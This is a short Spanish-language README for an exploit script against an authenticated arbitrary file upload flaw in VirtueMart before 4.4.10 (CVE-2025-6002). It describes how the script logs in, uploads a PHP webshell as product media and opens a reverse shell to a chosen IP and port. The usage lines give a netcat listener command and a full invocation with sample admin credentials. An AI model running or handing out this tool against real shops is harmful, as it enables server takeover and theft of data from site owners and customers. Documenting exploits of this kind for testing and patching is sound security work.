
Este script explota la vulnerabilidad autenticada de carga arbitraria de archivos en VirtueMart < 4.4.10 (CVE-2025-6002), que se describe en esta publicación del blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days
Este script inicia sesión en VirtueMart con las credenciales proporcionadas, crea un nuevo producto y sube un webshell PHP como archivo multimedia. Luego invoca una reverse shell a la IP/puerto proporcionados.
Parámetros:
Uso:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337